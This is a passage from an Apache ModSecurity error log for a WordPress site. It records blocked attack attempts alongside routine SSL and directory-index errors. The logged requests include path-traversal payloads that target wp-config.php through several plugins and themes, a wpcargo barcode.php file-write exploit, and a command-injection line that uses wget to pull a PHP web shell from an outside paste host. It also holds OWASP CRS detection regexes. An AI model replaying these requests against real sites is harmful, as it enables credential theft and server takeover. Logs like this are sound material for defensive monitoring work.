"/wp-content/themes/rowe/download/download.php"] [unique_id "Y8DyEKGMrWzzUVMdEhcM8AAAAMM"] [Fri Jan 13 00:54:26.318060 2023] [:error] [pid 31043:tid 140315289704192] [client 185.206.224.212:44158] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-e-commerce/wpsc-includes/misc.functions.php?image_name=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-e-commerce/wpsc-includes/misc.functions.php"] [unique_id "Y8DyEsx9A9c0KkSpLadQpAAAAIU"] [Fri Jan 13 00:54:32.885056 2023] [:error] [pid 31041:tid 140315405498112] [client 185.206.224.212:44182] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:img. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "136"] [id "950911"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: http/1.0 found within ARGS:img: ../wp-config.php?http/1.0?action=revslider_show_image"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y8DyGMPRCDYHCWWhHpAkBgAAAAA"] [Fri Jan 13 00:54:36.582376 2023] [:error] [pid 31476:tid 140315214169856] [client 185.206.224.212:44194] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "Y8DyHKGMrWzzUVMdEhcM9gAAAM4"] [Fri Jan 13 00:54:37.435072 2023] [:error] [pid 31043:tid 140315172206336] [client 185.206.224.212:44198] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=getfile&/../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y8DyHcx9A9c0KkSpLadQqgAAAJM"] [Fri Jan 13 00:54:37.552381 2023] [:error] [pid 31043:tid 140315397105408] [client 185.206.224.212:44200] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp\\xe2\\x80\\x94admin/admin\\xe2\\x80\\x94ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp\\xe2\\x80\\x94admin/admin\\xe2\\x80\\x94ajax.php"] [unique_id "Y8DyHcx9A9c0KkSpLadQqwAAAIE"] [Fri Jan 13 00:54:37.667710 2023] [:error] [pid 31476:tid 140315197384448] [client 185.206.224.212:44202] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/tess/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/tess/download.php"] [unique_id "Y8DyHaGMrWzzUVMdEhcM9wAAANA"] [Fri Jan 13 00:54:37.786232 2023] [:error] [pid 31476:tid 140315163813632] [client 185.206.224.212:44204] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/jarida/download.php?uri=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/jarida/download.php"] [unique_id "Y8DyHaGMrWzzUVMdEhcM-AAAANQ"] [Fri Jan 13 01:11:06.502720 2023] [:error] [pid 31476:tid 140315155420928] [client 5.188.62.26:46256] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y8D1-qGMrWzzUVMdEhcOpQAAANU"] [Fri Jan 13 03:24:27.310398 2023] [ssl:warn] [pid 6988:tid 140390377158528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 13 03:24:27.435559 2023] [ssl:warn] [pid 6989:tid 140390377158528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 13 03:24:27.796411 2023] [ssl:warn] [pid 6989:tid 140390377158528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 13 03:24:29.486644 2023] [ssl:warn] [pid 6989:tid 140390377158528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 13 03:24:31.818237 2023] [ssl:warn] [pid 7409:tid 140615064934272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 13 03:24:31.951900 2023] [ssl:warn] [pid 7410:tid 140615064934272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 13 19:04:08.199120 2023] [ssl:warn] [pid 7410:tid 140615064934272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 14 03:36:23.959043 2023] [ssl:warn] [pid 23086:tid 140593450628992] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 14 03:36:24.090246 2023] [ssl:warn] [pid 23087:tid 140593450628992] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 14 03:36:24.583671 2023] [ssl:warn] [pid 23087:tid 140593450628992] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 14 03:36:26.792224 2023] [ssl:warn] [pid 23087:tid 140593450628992] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 14 03:36:29.034585 2023] [ssl:warn] [pid 23595:tid 140649293850496] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 14 03:36:29.146433 2023] [ssl:warn] [pid 23596:tid 140649293850496] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 14 04:26:12.032910 2023] [autoindex:error] [pid 23920:tid 140648879408896] [client 43.135.154.163:41550] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Jan 14 07:12:51.660119 2023] [autoindex:error] [pid 23621:tid 140648988514048] [client 167.99.118.196:45658] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/quote/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Sat Jan 14 07:13:09.789683 2023] [autoindex:error] [pid 23619:tid 140648887801600] [client 167.99.118.196:45670] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Sat Jan 14 07:14:56.487662 2023] [autoindex:error] [pid 23619:tid 140648988514048] [client 69.27.14.138:45730] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Sat Jan 14 07:15:02.909243 2023] [autoindex:error] [pid 23920:tid 140649022084864] [client 167.99.118.196:45738] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/codemirror/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Sat Jan 14 07:15:03.638498 2023] [autoindex:error] [pid 23621:tid 140648971728640] [client 54.36.163.203:45742] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/01/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Sat Jan 14 07:15:04.198782 2023] [autoindex:error] [pid 23619:tid 140648921372416] [client 54.36.163.203:45744] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/03/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Sat Jan 14 07:15:43.400437 2023] [autoindex:error] [pid 23619:tid 140648871016192] [client 114.108.148.220:45754] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/09/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Sat Jan 14 07:15:43.456379 2023] [autoindex:error] [pid 23621:tid 140648938157824] [client 54.36.163.203:45756] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/05/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Sat Jan 14 07:15:55.927088 2023] [autoindex:error] [pid 23619:tid 140648854230784] [client 114.108.148.220:45770] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/08/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Sat Jan 14 07:16:23.052935 2023] [autoindex:error] [pid 23621:tid 140648879408896] [client 69.27.14.138:45786] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Sat Jan 14 07:16:30.856320 2023] [autoindex:error] [pid 23920:tid 140648971728640] [client 54.36.163.203:45790] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/02/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Sat Jan 14 07:17:01.791563 2023] [autoindex:error] [pid 23920:tid 140648887801600] [client 54.36.163.203:45802] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/04/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Sat Jan 14 07:18:03.681143 2023] [autoindex:error] [pid 23621:tid 140648946550528] [client 114.108.148.220:45840] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/10/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Sat Jan 14 07:18:07.842089 2023] [autoindex:error] [pid 23619:tid 140648980121344] [client 69.27.14.138:45844] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/01/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Sat Jan 14 07:19:03.536274 2023] [autoindex:error] [pid 23621:tid 140649005299456] [client 114.108.148.220:45868] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/07/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Sat Jan 14 07:19:06.736832 2023] [autoindex:error] [pid 23920:tid 140649022084864] [client 114.108.148.220:45872] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/06/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Sat Jan 14 07:20:21.089210 2023] [autoindex:error] [pid 23621:tid 140648862623488] [client 69.27.14.138:45926] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/12/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Sat Jan 14 07:20:40.537914 2023] [autoindex:error] [pid 23621:tid 140648837445376] [client 69.27.14.138:45930] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/11/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Sat Jan 14 10:31:23.093890 2023] [autoindex:error] [pid 23619:tid 140649030477568] [client 162.210.97.60:51498] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/blue/index.php [Sat Jan 14 15:22:01.680677 2023] [autoindex:error] [pid 23621:tid 140648980121344] [client 158.69.1.76:59524] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Sat Jan 14 19:03:25.328369 2023] [ssl:warn] [pid 23596:tid 140649293850496] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 14 19:47:30.515440 2023] [:error] [pid 32227:tid 140648980121344] [client 116.203.31.94:41862] [client 116.203.31.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpcargo/includes/barcode.php"] [unique_id "Y8NNIj1hGdK8jgtGFaLWmAAAAMc"], referer: www.google.com [Sat Jan 14 19:47:33.664830 2023] [:error] [pid 32227:tid 140648912979712] [client 116.203.31.94:41866] [client 116.203.31.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:2. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:2: wget https:/pst.klgrth.io/paste/e7yx8/raw -O king.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/x.php"] [unique_id "Y8NNJT1hGdK8jgtGFaLWmQAAAM8"], referer: www.google.com [Sun Jan 15 03:46:27.192579 2023] [ssl:warn] [pid 30111:tid 139987955914624] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 15 03:46:27.314407 2023] [ssl:warn] [pid 30112:tid 139987955914624] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 15 03:46:27.763638 2023] [ssl:warn] [pid 30112:tid 139987955914624] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 15 03:46:29.706806 2023] [ssl:warn] [pid 30112:tid 139987955914624] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 15 03:46:31.932474 2023] [ssl:warn] [pid 30530:tid 140365741508480] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 15 03:46:32.046591 2023] [ssl:warn] [pid 30531:tid 140365741508480] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 15 04:25:18.003849 2023] [autoindex:error] [pid 30554:tid 140365552494336] [client 194.169.175.39:38696] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Jan 15 06:20:55.841568 2023] [:error] [pid 31462:tid 140365527316224] [client 195.201.229.247:42020] [client 195.201.229.247] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpcargo/includes/barcode.php"] [unique_id "Y8Phl8_63pWztXBWSdnpsQAAAMQ"], referer: www.google.com [Sun Jan 15 06:20:56.790177 2023] [:error] [pid 30555:tid 140365394847488] [client 195.201.229.247:42022] [client 195.201.229.247] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:2. [file 